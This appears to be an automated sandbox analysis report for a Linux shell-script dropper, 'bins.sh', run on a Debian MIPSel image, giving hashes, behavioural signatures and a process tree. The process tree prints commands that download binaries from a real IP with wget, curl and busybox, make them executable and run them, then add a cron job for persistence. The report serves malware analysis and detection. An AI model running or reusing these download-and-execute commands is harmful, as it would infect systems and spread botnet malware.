Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    09-11-2024 10:42

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    dbbbfb2de892410f6016324f5c72c881

  • SHA1

    24f8818e5bf61c88bd7c47818ce2ab9a3de68f94

  • SHA256

    0de635c2e545ff9866cce84becebf513f8c7b2276e78fb2eda6f39f1d7149e49

  • SHA512

    a1ae894484d24a377e5ad84885c8758aaced9b067f64e0591f4892716e4bd844605aed37cf7e8f67c94b89889cc18e66e63439ea7095334710c9886efa901016

  • SSDEEP

    192:GcUjeSO0HQTDiswV1VZcIigJS25QQQcPTYJS25QQVPTYXwJHITDiswVbcUjeSJj:1NTDiJV1VqbgycPTY3PTYA+TDiJVb

Malware Config

Signatures

  • Contacts a large (2168) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:700
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:702
        • /usr/bin/wget
          wget http://87.120.84.230/bins/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR
          2⤵
          • Writes file to tmp directory
          PID:703
        • /usr/bin/curl
          curl -O http://87.120.84.230/bins/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR
          2⤵
          • Writes file to tmp directory
          PID:724
        • /bin/busybox
          /bin/busybox wget http://87.120.84.230/bins/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR
          2⤵
          • Writes file to tmp directory
          PID:730
        • /bin/chmod
          chmod 777 XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR
          2⤵
          • File and Directory Permissions Modification
          PID:731
        • /tmp/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR
          ./XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:732
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:734
              • /usr/bin/crontab
                crontab -l
                4⤵
                  PID:735
              • /bin/sh
                sh -c "crontab -"
                3⤵
                  PID:736
                  • /usr/bin/crontab
                    crontab -
                    4⤵
                    • Creates/modifies Cron job
                    PID:737
              • /bin/rm
                rm XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR
                2⤵
                  PID:741
                • /usr/bin/wget
                  wget http://87.120.84.230/bins/I0lFteEawbJ2WBcXsletRRgRlmO7jvdj72
                  2⤵
                    PID:742

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR

                  Filesize

                  151KB

                  MD5

                  6c583043d91c55aa470c08c87058e917

                  SHA1

                  abf65a5b9bba69980278ad09356e53de8bb89439

                  SHA256

                  2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

                  SHA512

                  82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

                • /var/spool/cron/crontabs/tmp.NvxzGY

                  Filesize

                  210B

                  MD5

                  2861b320495e2318e0843ae7d57a6110

                  SHA1

                  0efafa3da2c1979e831af58a6b7d8bcb781df75b

                  SHA256

                  c7251c73ec9279ce977869a1ff7d3db374b5fa6e85490a6ef93c2170ee1f867d

                  SHA512

                  681086df066a2ea4d4b29e90f650eb57f2b6313a45f138bb71e2cd0ad7271981dc4095217b1b1a21556e4985a3e60b102f4cc0c71c39bea7728b357d7c02a7c1